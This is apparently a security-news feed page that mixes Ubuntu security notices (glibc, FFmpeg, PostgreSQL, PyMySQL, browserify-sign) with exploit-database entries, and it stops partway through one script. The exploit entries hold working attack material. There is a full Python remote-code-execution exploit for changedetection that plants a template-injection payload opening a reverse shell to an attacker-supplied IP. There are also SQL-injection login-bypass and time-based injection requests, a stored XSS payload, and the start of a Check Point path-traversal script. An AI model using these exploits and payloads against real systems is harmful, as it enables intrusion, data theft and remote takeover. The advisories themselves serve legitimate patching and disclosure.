Ubuntu Security Notice 6804-1 - It was discovered that GNU C Library nscd daemon contained a stack-based buffer overflow. A local attacker could use this to cause a denial of service. It was discovered that GNU C Library nscd daemon did not properly check the cache content, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6804-1  
May 31, 2024

glibc vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in GNU C Library.

Software Description:  
- glibc: GNU C Library

Details:

It was discovered that GNU C Library nscd daemon contained a stack-based buffer  
overflow. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2024-33599)

It was discovered that GNU C Library nscd daemon did not properly check the  
cache content, leading to a null pointer dereference vulnerability. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2024-33600)

It was discovered that GNU C Library nscd daemon did not properly validate  
memory allocation in certain situations, leading to a null pointer dereference  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2024-33601)

It was discovered that GNU C Library nscd daemon did not properly handle memory  
allocation, which could lead to memory corruption. A local attacker could use  
this to cause a denial of service (system crash). (CVE-2024-33602)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  nscd                            2.39-0ubuntu8.2

Ubuntu 23.10  
  nscd                            2.38-1ubuntu6.3

Ubuntu 22.04 LTS  
  nscd                            2.35-0ubuntu3.8

Ubuntu 20.04 LTS  
  nscd                            2.31-0ubuntu9.16

Ubuntu 18.04 LTS  
  nscd                            2.27-3ubuntu1.6+esm3  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  nscd                            2.23-0ubuntu11.3+esm7  
                                  Available with Ubuntu Pro

After a standard system update you need to restart nscd to make  
all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6804-1  
  CVE-2024-33599, CVE-2024-33600, CVE-2024-33601, CVE-2024-33602

Package Information:  
  https://launchpad.net/ubuntu/+source/glibc/2.39-0ubuntu8.2  
  https://launchpad.net/ubuntu/+source/glibc/2.38-1ubuntu6.3  
  https://launchpad.net/ubuntu/+source/glibc/2.35-0ubuntu3.8  
  https://launchpad.net/ubuntu/+source/glibc/2.31-0ubuntu9.16

Ubuntu Security Notice USN-6804-1

Ubuntu Security Notice 6803-1 - Zeng Yunxiang and Song Jiaxuan discovered that FFmpeg incorrectly handled certain input files. An attacker could possibly use this issue to cause FFmpeg to crash, resulting in a denial of service, or potential arbitrary code execution. This issue only affected Ubuntu 24.04 LTS. Zeng Yunxiang and Song Jiaxuan discovered that FFmpeg incorrectly handled certain input files. An attacker could possibly use this issue to cause FFmpeg to crash, resulting in a denial of service, or potential arbitrary code execution. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6803-1May 30, 2024ffmpeg vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 23.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 LTSSummary:FFmpeg could be made to crash or run programs as your login if itopened a specially crafted file.Software Description:- ffmpeg: Tools for transcoding, streaming and playing of multimedia filesDetails:Zeng Yunxiang and Song Jiaxuan discovered that FFmpeg incorrectly handledcertain input files. An attacker could possibly use this issue to causeFFmpeg to crash, resulting in a denial of service, or potential arbitrarycode execution. This issue only affected Ubuntu 24.04 LTS. (CVE-2023-49501)Zeng Yunxiang and Song Jiaxuan discovered that FFmpeg incorrectly handledcertain input files. An attacker could possibly use this issue to causeFFmpeg to crash, resulting in a denial of service, or potential arbitrarycode execution. This issue only affected Ubuntu 18.04 LTS,Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.(CVE-2023-49502)Zhang Ling and Zeng Yunxiang discovered that FFmpeg incorrectly handledcertain input files. An attacker could possibly use this issue to causeFFmpeg to crash, resulting in a denial of service, or potential arbitrarycode execution. This issue only affected Ubuntu 23.10 andUbuntu 24.04 LTS. (CVE-2023-49528)Zeng Yunxiang discovered that FFmpeg incorrectly handled certain inputfiles. An attacker could possibly use this issue to cause FFmpeg to crash,resulting in a denial of service, or potential arbitrary code execution.This issue only affected Ubuntu 23.10 and Ubuntu 24.04 LTS.(CVE-2023-50007)Zeng Yunxiang and Song Jiaxuan discovered that FFmpeg incorrectly handledcertain input files. An attacker could possibly use this issue to causeFFmpeg to crash, resulting in a denial of service, or potential arbitrarycode execution. This issue only affected Ubuntu 23.10 andUbuntu 24.04 LTS. (CVE-2023-50008)Zeng Yunxiang discovered that FFmpeg incorrectly handled certain inputfiles. An attacker could possibly use this issue to cause FFmpeg to crash,resulting in a denial of service, or potential arbitrary code execution.This issue only affected Ubuntu 23.10. (CVE-2023-50009)Zeng Yunxiang discovered that FFmpeg incorrectly handled certain inputfiles. An attacker could possibly use this issue to cause FFmpeg to crash,resulting in a denial of service, or potential arbitrary code execution.This issue only affected Ubuntu 16.04 LTS, Ubuntu 18.04 LTS,Ubuntu 20.04 LTS, Ubuntu 22.04 LTS and Ubuntu 23.10. (CVE-2023-50010)Zeng Yunxiang and Li Zeyuan discovered that FFmpeg incorrectly handledcertain input files. An attacker could possibly use this issue to causeFFmpeg to crash, resulting in a denial of service, or potential arbitrarycode execution. This issue only affected Ubuntu 23.10 andUbuntu 24.04 LTS. (CVE-2023-51793)Zeng Yunxiang discovered that FFmpeg incorrectly handled certain inputfiles. An attacker could possibly use this issue to cause FFmpeg to crash,resulting in a denial of service, or potential arbitrary code execution.This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS,Ubuntu 22.04 LTS and Ubuntu 23.10. (CVE-2023-51794, CVE-2023-51798)Zeng Yunxiang discovered that FFmpeg incorrectly handled certain inputfiles. An attacker could possibly use this issue to cause FFmpeg to crash,resulting in a denial of service, or potential arbitrary code execution.This issue only affected Ubuntu 23.10. (CVE-2023-51795, CVE-2023-51796)It was discovered that discovered that FFmpeg incorrectly handled certaininput files. An attacker could possibly use this issue to cause FFmpeg tocrash, resulting in a denial of service, or potential arbitrary codeexecution. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS,Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS. (CVE-2024-31578)It was discovered that discovered that FFmpeg incorrectly handled certaininput files. An attacker could possibly use this issue to cause FFmpeg tocrash, resulting in a denial of service, or potential arbitrary codeexecution. This issue only affected Ubuntu 23.10 and Ubuntu 24.04 LTS.(CVE-2024-31582)It was discovered that discovered that FFmpeg incorrectly handled certaininput files. An attacker could possibly use this issue to cause FFmpeg tocrash, resulting in a denial of service, or potential arbitrary codeexecution. This issue only affected Ubuntu 23.10. (CVE-2024-31585)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   ffmpeg                          7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavcodec-extra60              7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavcodec60                    7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavdevice60                   7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavfilter-extra9              7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavfilter9                    7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavformat-extra60             7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavformat60                   7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libavutil58                     7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libpostproc57                   7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libswresample4                  7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu Pro   libswscale7                     7:6.1.1-3ubuntu5+esm1                                   Available with Ubuntu ProUbuntu 23.10   ffmpeg                          7:6.0-6ubuntu1.1   libavcodec-extra60              7:6.0-6ubuntu1.1   libavcodec60                    7:6.0-6ubuntu1.1   libavdevice60                   7:6.0-6ubuntu1.1   libavfilter-extra9              7:6.0-6ubuntu1.1   libavfilter9                    7:6.0-6ubuntu1.1   libavformat-extra60             7:6.0-6ubuntu1.1   libavformat60                   7:6.0-6ubuntu1.1   libavutil58                     7:6.0-6ubuntu1.1   libpostproc57                   7:6.0-6ubuntu1.1   libswresample4                  7:6.0-6ubuntu1.1   libswscale7                     7:6.0-6ubuntu1.1Ubuntu 22.04 LTS   ffmpeg                          7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavcodec-extra58              7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavcodec58                    7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavdevice58                   7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavfilter-extra7              7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavfilter7                    7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavformat-extra               7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavformat-extra58             7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavformat58                   7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libavutil56                     7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libpostproc55                   7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libswresample3                  7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu Pro   libswscale5                     7:4.4.2-0ubuntu0.22.04.1+esm4                                   Available with Ubuntu ProUbuntu 20.04 LTS   ffmpeg                          7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavcodec-extra58              7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavcodec58                    7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavdevice58                   7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavfilter-extra7              7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavfilter7                    7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavformat58                   7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavresample4                  7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavutil56                     7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libpostproc55                   7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libswresample3                  7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libswscale5                     7:4.2.7-0ubuntu0.1+esm5                                   Available with Ubuntu ProUbuntu 18.04 LTS   ffmpeg                          7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavcodec-extra57              7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavcodec57                    7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavdevice57                   7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavfilter-extra6              7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavfilter6                    7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavformat57                   7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavresample3                  7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libavutil55                     7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libpostproc54                   7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libswresample2                  7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu Pro   libswscale4                     7:3.4.11-0ubuntu0.1+esm5                                   Available with Ubuntu ProUbuntu 16.04 LTS   ffmpeg                          7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libavcodec-ffmpeg-extra56       7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libavcodec-ffmpeg56             7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libavdevice-ffmpeg56            7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libavfilter-ffmpeg5             7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libavformat-ffmpeg56            7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libavresample-ffmpeg2           7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libavutil-ffmpeg54              7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libpostproc-ffmpeg53            7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libswresample-ffmpeg1           7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu Pro   libswscale-ffmpeg3              7:2.8.17-0ubuntu0.1+esm7                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6803-1   CVE-2023-49501, CVE-2023-49502, CVE-2023-49528, CVE-2023-50007,   CVE-2023-50008, CVE-2023-50009, CVE-2023-50010, CVE-2023-51793,   CVE-2023-51794, CVE-2023-51795, CVE-2023-51796, CVE-2023-51798,   CVE-2024-31578, CVE-2024-31582, CVE-2024-31585Package Information:   https://launchpad.net/ubuntu/+source/ffmpeg/7:6.0-6ubuntu1.1

Ubuntu Security Notice USN-6803-1

Ubuntu Security Notice 6802-1 - Lukas Fittl discovered that PostgreSQL incorrectly performed authorization in the built-in pg_stats_ext and pg_stats_ext_exprs views. An unprivileged database user can use this issue to read most common values and other statistics from CREATE STATISTICS commands of other users.

==========================================================================  
Ubuntu Security Notice USN-6802-1  
May 30, 2024

postgresql-14, postgresql-15, postgresql-16 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS

Summary:

PostgreSQL could be made to expose sensitive information.

Software Description:  
- postgresql-16: Object-relational SQL database  
- postgresql-15: Object-relational SQL database  
- postgresql-14: Object-relational SQL database

Details:

Lukas Fittl discovered that PostgreSQL incorrectly performed authorization  
in the built-in pg_stats_ext and pg_stats_ext_exprs views. An unprivileged  
database user can use this issue to read most common values and other  
statistics from CREATE STATISTICS commands of other users.

NOTE: This update will only fix fresh PostgreSQL installations. Current  
PostgreSQL installations will remain vulnerable to this issue until manual  
steps are performed. Please see the instructions in the changelog located  
at /usr/share/doc/postgresql-*/changelog.Debian.gz after the updated  
packages have been installed, or in the PostgreSQL release notes located  
here:

https://www.postgresql.org/docs/16/release-16-3.html  
https://www.postgresql.org/docs/15/release-15-7.html  
https://www.postgresql.org/docs/14/release-14-12.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   postgresql-16                   16.3-0ubuntu0.24.04.1  
   postgresql-client-16            16.3-0ubuntu0.24.04.1

Ubuntu 23.10  
   postgresql-15                   15.7-0ubuntu0.23.10.1  
   postgresql-client-15            15.7-0ubuntu0.23.10.1

Ubuntu 22.04 LTS  
   postgresql-14                   14.12-0ubuntu0.22.04.1  
   postgresql-client-14            14.12-0ubuntu0.22.04.1

This update uses a new upstream release, which includes additional bug  
fixes. After a standard system update you need to restart PostgreSQL to  
make all the necessary changes, and possibly perform manual steps as  
described above.

References:  
   https://ubuntu.com/security/notices/USN-6802-1  
   CVE-2024-4317

Package Information:  
   https://launchpad.net/ubuntu/+source/postgresql-16/16.3-0ubuntu0.24.04.1  
   https://launchpad.net/ubuntu/+source/postgresql-15/15.7-0ubuntu0.23.10.1  
   https://launchpad.net/ubuntu/+source/postgresql-14/14.12-0ubuntu0.22.04.1

Ubuntu Security Notice USN-6802-1

changedetection versions 0.45.20 and below suffer from a remote code execution vulnerability.

    # Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE)# Date: 5-26-2024# Exploit Author: Zach Crosman (zcrosman)# Vendor Homepage: changedetection.io# Software Link: https://github.com/dgtlmoon/changedetection.io# Version: <= 0.45.20# Tested on: Linux# CVE : CVE-2024-32651from pwn import *import requestsfrom bs4 import BeautifulSoupimport argparsedef start_listener(port):    listener = listen(port)    print(f"Listening on port {port}...")    conn = listener.wait_for_connection()    print("Connection received!")    context.newline = b'\r\n'    # Switch to interactive mode    conn.interactive()def add_detection(url, listen_ip, listen_port, notification_url=''):    session = requests.Session()        # First request to get CSRF token    request1_headers = {        "Cache-Control": "max-age=0",        "Upgrade-Insecure-Requests": "1",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",        "Accept-Encoding": "gzip, deflate",        "Accept-Language": "en-US,en;q=0.9",        "Connection": "close"    }    response = session.get(url, headers=request1_headers)    soup = BeautifulSoup(response.text, 'html.parser')    csrf_token = soup.find('input', {'name': 'csrf_token'})['value']    print(f'Obtained CSRF token: {csrf_token}')    # Second request to submit the form and get the redirect URL    add_url = f"{url}/form/add/quickwatch"    add_url_headers = {  # Define add_url_headers here        "Origin": url,        "Content-Type": "application/x-www-form-urlencoded"    }    add_url_data = {        "csrf_token": csrf_token,        "url": "https://reddit.com/r/baseball",        "tags": '',        "edit_and_watch_submit_button": "Edit > Watch",        "processor": "text_json_diff"    }    post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False)    # Extract the URL from the Location header    if 'Location' in post_response.headers:        redirect_url = post_response.headers['Location']        print(f'Redirect URL: {redirect_url}')    else:        print('No redirect URL found')        return    # Third request to add the changedetection url with ssti in notification config    save_detection_url = f"{url}{redirect_url}"    save_detection_headers = {  # Define save_detection_headers here        "Referer": redirect_url,        "Cookie": f"session={session.cookies.get('session')}"    }    save_detection_data = {        "csrf_token": csrf_token,        "url": "https://reddit.com/r/all",        "title": '',        "tags": '',        "time_between_check-weeks": '',        "time_between_check-days": '',        "time_between_check-hours": '',        "time_between_check-minutes": '',        "time_between_check-seconds": '30',        "filter_failure_notification_send": 'y',        "fetch_backend": 'system',        "webdriver_delay": '',        "webdriver_js_execute_code": '',        "method": 'GET',        "headers": '',        "body": '',        "notification_urls": notification_url,        "notification_title": '',        "notification_body": f"""        {{% for x in ().__class__.__base__.__subclasses__() %}}        {{% if "warning" in x.__name__ %}}        {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}        {{% endif %}}        {{% endfor %}}        """,        "notification_format": 'System default',        "include_filters": '',        "subtractive_selectors": '',        "filter_text_added": 'y',        "filter_text_replaced": 'y',        "filter_text_removed": 'y',        "trigger_text": '',        "ignore_text": '',        "text_should_not_be_present": '',        "extract_text": '',        "save_button": 'Save'    }    final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data)    print('Final request made.')if __name__ == "__main__":    parser = argparse.ArgumentParser(description='Add detection and start listener')    parser.add_argument('--url', type=str, required=True, help='Base URL of the target site')    parser.add_argument('--port', type=int, help='Port for the listener', default=4444)    parser.add_argument('--ip', type=str, required=True, help='IP address for the listener')    parser.add_argument('--notification', type=str, help='Notification url if you don\'t want to use the system default')    args = parser.parse_args()    add_detection(args.url, args.ip, args.port, args.notification)    start_listener(args.port)

changedetection 0.45.20 Remote Code Execution

Online Payment Hub System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Online Payment Hub System - SQLi Authentication Bypass# Date: 29.05.2024# Exploit Author: Hamit Avşar# Vendor Homepage: https://www.sourcecodester.com/php/15018/online-payment-hub-using-php-and-paypal-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=15018&title=Online+Payment+Hub+using+PHP+and+PayPal+Free+Source+Code# Version: 1.0# Tested on: Windows 11, Kali Linux# Online Payment Hub System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.Steps To Reproduce:1 - Go to the login page http://localhost/oph/admin/login.php2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.3 - Click on "Login" button and you are logged in as administrator.PoCRequestPOST /oph/classes/Login.php?f=login HTTP/1.1Host: localhostContent-Length: 42sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/oph/admin/login.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479iConnection: closeusername=admin'+or+'1'%3D'1&password=hamit--------------------------------------------------------------------------------------------------------------------------------responseHTTP/1.1 200 OKDate: Wed, 29 May 2024 17:15:28 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30X-Powered-By: PHP/8.0.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 20Connection: closeContent-Type: text/html; charset=UTF-8{"status":"success"}

Online Payment Hub System 1.0 SQL Injection

Ubuntu Security Notice 6801-1 - It was discovered that PyMySQL incorrectly escaped untrusted JSON input. An attacker could possibly use this issue to perform SQL injection attacks.

==========================================================================  
Ubuntu Security Notice USN-6801-1  
May 30, 2024

python-pymysql vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

PyMySQL could be vulnerable to SQL injection attacks.

Software Description:  
- python-pymysql: Pure-Python MySQL driver

Details:

It was discovered that PyMySQL incorrectly escaped untrusted JSON input. An  
attacker could possibly use this issue to perform SQL injection attacks.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   python3-pymysql                 1.0.2-2ubuntu1.1

Ubuntu 23.10  
   python3-pymysql                 1.0.2-1ubuntu1.23.10.1

Ubuntu 22.04 LTS  
   python3-pymysql                 1.0.2-1ubuntu1.22.04.1

Ubuntu 20.04 LTS  
   python3-pymysql                 0.9.3-2ubuntu3.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6801-1  
   CVE-2024-36039

Package Information:  
   https://launchpad.net/ubuntu/+source/python-pymysql/1.0.2-2ubuntu1.1  
   https://launchpad.net/ubuntu/+source/python-pymysql/1.0.2-1ubuntu1.23.10.1  
   https://launchpad.net/ubuntu/+source/python-pymysql/1.0.2-1ubuntu1.22.04.1  
   https://launchpad.net/ubuntu/+source/python-pymysql/0.9.3-2ubuntu3.1

Ubuntu Security Notice USN-6801-1

Ubuntu Security Notice 6800-1 - It was discovered that browserify-sign incorrectly handled an upper bound check in signature verification. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to perform a signature forgery attack.

==========================================================================  
Ubuntu Security Notice USN-6800-1  
May 30, 2024

node-browserify-sign vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

browserify-sign could allow unintended access if it opened a specially crafted  
file.

Software Description:  
- node-browserify-sign: createSign and createVerify in your browser

Details:

It was discovered that browserify-sign incorrectly handled an upper bound check  
in signature verification. If a user or an automated system were tricked into  
opening a specially crafted input file, a remote attacker could possibly use  
this issue to perform a signature forgery attack.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10  
   node-browserify-sign            4.2.1-3ubuntu0.1

Ubuntu 22.04 LTS  
   node-browserify-sign            4.2.1-2ubuntu0.1

Ubuntu 20.04 LTS  
   node-browserify-sign            4.0.4-2ubuntu0.20.04.1

Ubuntu 18.04 LTS  
   node-browserify-sign            4.0.4-2ubuntu0.18.04.1~esm1  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6800-1  
   CVE-2023-46234

Package Information:  
   https://launchpad.net/ubuntu/+source/node-browserify-sign/4.2.1-3ubuntu0.1  
   https://launchpad.net/ubuntu/+source/node-browserify-sign/4.2.1-2ubuntu0.1  
   https://launchpad.net/ubuntu/+source/node-browserify-sign/4.0.4-2ubuntu0.20.04.1

Ubuntu Security Notice USN-6800-1

BWL Advanced FAQ Manager version 2.0.3 suffers from a remote SQL injection vulnerability.

    Exploit Title: BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL InjectionDate: 14 Apr 2024Exploit Author: Ivan Spiridonov (xbz0n)Software Link: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135Version: 2.0.3Tested on: Ubuntu 20.04CVE: CVE-2024-32136SQL InjectionSQL injection is a type of security vulnerability that allows an attacker to interfere with an application's database queries. It usually involves the insertion or "injection" of an SQL query via the input data from the client into the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.Affected ComponentsPlugin: BWL Advanced FAQ ManagerVersion: 2.0.3Affected Parameter: 'date_range'Affected Page: /wp-admin/edit.phpDescriptionThe vulnerability exists within the 'date_range' parameter used in the 'bwl-advanced-faq-analytics' page of the BWL Advanced FAQ Manager plugin. Authenticated attackers can execute arbitrary SQL commands within the database by manipulating the input to this parameter.Proof of ConceptManual ExploitationThe following GET request demonstrates the vulnerability:GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analyticsConnection: closeCookie: [Relevant Cookies]Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.RecommendationsBWL Advanced FAQ Manager v2.0.3 users are advised to update the plugin to the fixed version v2.0.4.

BWL Advanced FAQ Manager 2.0.3 SQL Injection

iMLog versions prior to 1.307 suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: iMLog < 1.307 - Persistent Cross Site Scripting (XSS)# Date: 22/5/2024# Exploit Author: Gabriel Felipe# Vendor Homepage: https://itssglobal.com# Software Link: https://itssglobal.com/index.php/imlog/# Version: 1.307# Tested on: Firefox and Chrome Browsers# Patched Version: 1.308# Category: Web Application# PoC:iMLog < 1.307 is vulnerable to persistent cross-site scripting (XSS) via the "User Management" feature. An attacker could inject malicious javascript code on a controlled user so when an admin goes to the "User Maintenance" malicious code is executed and could lead to new admin user creations resulting in privilege escalation.1. Login to user account2. Go to Setup > "User Maintenance"3. Click on "Search" and then select your UserID.4. Change the "Last Name" input to `<img/src/onerror=prompt('XSS')>`5. Click on "Save"6. Refresh the page, XSS will be triggered.

iMLog Cross Site Scripting

Check Point Security Gateway suffers from an information disclosure vulnerability. Versions affected include R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, and R81.20.

    # Exploit Title:  Check Point Security Gateway - Information Disclosure (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 # CVE : CVE-2024-24919from requests import Request, Sessionimport sysimport jsondef title():    print('''       _______      ________    ___   ___ ___  _  _        ___  _  _   ___  __  ___    / ____\ \    / /  ____|  |__ \ / _ \__ \| || |      |__ \| || | / _ \/_ |/ _ \  | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) | | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______/ /|__   _\__, || |\__, | | |____   \  /  | |____    / /_| |_| / /_   | |       / /_   | |   / / | |  / /   \_____|   \/   |______|  |____|\___/____|  |_|      |____|  |_|  /_/  |_| /_/                                                                                                                                                                                                                                                                                                                                                                 Author: Yesith AlvarezGithub: https://github.com/yealvarezLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/    ''')   def exploit(url, path):  url = url + '/clients/MyCRL'  data =   "aCSHELL/../../../../../../../../../../.."+ path  headers = {            'Connection': 